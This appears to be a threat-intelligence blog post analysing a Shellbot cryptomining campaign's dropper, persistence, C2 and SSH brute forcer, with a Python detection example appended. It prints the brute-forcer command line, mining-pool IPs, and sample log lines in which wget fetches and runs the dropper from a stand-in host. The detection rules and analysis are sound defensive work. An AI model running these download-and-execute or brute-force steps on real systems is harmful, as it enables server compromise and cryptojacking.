Inside an Active Shellbot Cryptomining Malware Campaign

Threat Stack’s Security Operations Center (SOC) recently discovered an ongoing and evolving cryptojacking campaign that leverages a new variant of the Shellbot malware, originally discovered by JASK in November 2018 and published in February 2019. In this new variant of the Shellbot campaign, Threat Stack has identified the addition of a new SSH brute force tool, a secondary command and control method, and the added ability to stop other cryptominers on infected servers.

Possible Initial Vector

Cloud Attack Step 1

A shell script named tddwrt7s.sh is downloaded to /dev/shm or /tmp. The script is then executed with seven different URLs as arguments, each pointing to the same archive (dota.tar.gz) that contains the malware payload. The script chooses one of the URLs at random, downloads the payload, uncompresses it and executes it.

Installation and Persistence

Cloud Attack Step 2

This campaign uses a series of scripts and executables to install and persist on a target system. The first shell script (either initall or init2) removes old installations of the malware and then runs the script init. This both installs the malware components and makes them persistent on the system by stepping through a series of subfolders (a,b,c) and overwriting crontab.

Cryptominer Killer Script

One of the more interesting parts of this malware campaign is that it checks to see whether there are other cryptominers on the system and stops them if there are. This would normally be considered a good thing if it didn’t turn around and install its own cryptominer on the system. This is accomplished by a 272-line shell script named init0.

Cryptominer Installation/Initialization

The cryptominer is initialized through two shell scripts named a and run. The shell script a creates a new shell script named upd and executes it, which in turn executes run. The script run then launches either the 32-bit or the 64-bit version of the cryptominer, named anacron and cron respectively. There is also a script named stop which acts as a kill switch. The cryptominer makes connections to two MoneroHash IPs (107.191.99.221 and 107.191.99.95) and starts mining.

C2 Installation/Initialization

The initialization of the Command and Control component is accomplished through shell scripts also named a and run. The script a creates the script named sync which executes run. The scripts execute a packed perl script named rsync and an executable named ps. The perl script rsync allows Command and Control via IRC, and ps allows for SSH connections from malicious infrastructure and also locks users out of the system. There is also a kill switch script named stop.

C2 Summary

The Command and Control component consists of the files rsync and ps. The file rsync is a packed perl script which connects to a malicious IRC server which acts as the C2 infrastructure. It allows for both preconfigured commands and direct shell access. The file ps is likely used to establish another persistence mechanism by removing the compromised user’s .ssh folder and creating its own.

SSH Brute Forcer Installation/Initialization

The final component is the SSH brute forcer which, much like its compatriots, relies on a series of shell scripts to initialize. The shell script start is run by one of the init scripts; it then creates a new shell script named aptitude which runs the script named run. Then run executes a shell script named go.

SSH Brute Forcer Operation

The shell script go downloads a file named xtr which contains an IP address. An IP list and a password list (named a and b respectively) are then downloaded from the IP named in the xtr file. These files are renamed to ip and p and passed to a shell script named tsm: timeout 90m ./tsm -t $threads -f 0 -s 10 -S 10 -p 0 p ip. This command starts the brute forcer, which runs for a set period of time and then restarts. Newer variations are set to run for 24 hours instead of 90 minutes.

Conclusion

Overall, this is a sophisticated malware campaign that has been updated at least once during the investigation and will likely continue to be updated as time goes on. The main goal of this campaign appears to be monetary gain via cryptomining and propagation to other systems on the internet. However, the possibility of data exfiltration and/or lateral movement cannot be discounted, as the malware appears to have the capability to perform more than just cryptomining.

Do We Catch It? Yes We Do!

The current form of the campaign will be detected by the Threat Stack Cloud Security Platform since it partially executes out of /tmp/ and downloads files via wget and cURL. While it has been detected in both live customer environments and test environments, the full level of detection will be dependent on the rulesets enabled.
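As an added example (not Threat Stack's rule engine or any code from the campaign), the following Python turns the behaviours described in this write-up into simple detection rules and runs them over a few constructed process and connection records. The key=value log format, hostnames, pids and the /tmp/x/{a,b,c} paths are assumptions; the indicators themselves (execution from /tmp or /dev/shm, wget/cURL fetching tddwrt7s.sh or dota.tar.gz, crontab rewritten from a temp directory, the tsm brute forcer command line, and the two MoneroHash IPs) come from the text above.

```python
import re

# Indicators taken from the write-up above. The log format is a constructed,
# simplified process/connection record (key=value pairs), not Threat Stack's own.
SUSPECT_DIRS = ("/tmp/", "/dev/shm/")
PAYLOAD_NAMES = ("tddwrt7s.sh", "dota.tar.gz")
POOL_IPS = {"107.191.99.221", "107.191.99.95"}
DOWNLOADERS = {"wget", "curl"}

def parse_event(line):
    """Parse 'key=value' and 'key="quoted value"' pairs into a dict."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def classify(event):
    """Return the campaign indicators matched by one event, in a fixed order."""
    exe, cmd, dst = event.get("exe", ""), event.get("cmdline", ""), event.get("dst_ip", "")
    argv0 = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
    hits = []
    if exe.startswith(SUSPECT_DIRS):            # anything run out of /tmp or /dev/shm
        hits.append("exec_from_tmp")
    if argv0 in DOWNLOADERS and any(n in cmd for n in PAYLOAD_NAMES):
        hits.append("payload_download")        # wget/curl fetching dropper or archive
    if argv0 == "crontab" and event.get("cwd", "").startswith(SUSPECT_DIRS):
        hits.append("crontab_overwrite")       # persistence step run from a temp dir
    if re.search(r"timeout\s+\d+[mh]\s+\./tsm\s", cmd):
        hits.append("ssh_bruteforcer")         # 'timeout 90m ./tsm ...' command line
    if dst in POOL_IPS:
        hits.append("mining_pool_connect")     # outbound to the MoneroHash IPs
    return hits

def scan(lines):
    """Return pid and matched indicators for every event that hit at least one rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            findings.append({"pid": ev.get("pid"), "hits": hits})
    return findings

# Constructed sample events modelled on the campaign flow; hosts, paths and
# pids are made up (the page does not give the extracted directory name).
SAMPLE_LOG = [
    'pid=4101 cwd="/dev/shm" exe="/usr/bin/wget" cmdline="wget http://host.invalid/tddwrt7s.sh"',
    'pid=4102 cwd="/dev/shm" exe="/dev/shm/tddwrt7s.sh" cmdline="sh tddwrt7s.sh http://host.invalid/dota.tar.gz"',
    'pid=4120 cwd="/tmp/x/a" exe="/usr/bin/crontab" cmdline="crontab newcron"',
    'pid=4150 cwd="/tmp/x/c" exe="/usr/bin/timeout" cmdline="timeout 90m ./tsm -t 64 -f 0 -s 10 -S 10 -p 0 p ip"',
    'pid=4160 cwd="/tmp/x/b" exe="/tmp/x/b/cron" cmdline="./cron" dst_ip=107.191.99.221',
    'pid=4200 cwd="/home/user" exe="/usr/bin/curl" cmdline="curl https://host.invalid/index.html"',
]
```

Running scan(SAMPLE_LOG) flags the first five records and ignores the benign cURL download; the benign record shows why the wget/cURL rule should key on the payload names rather than on the downloader alone.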
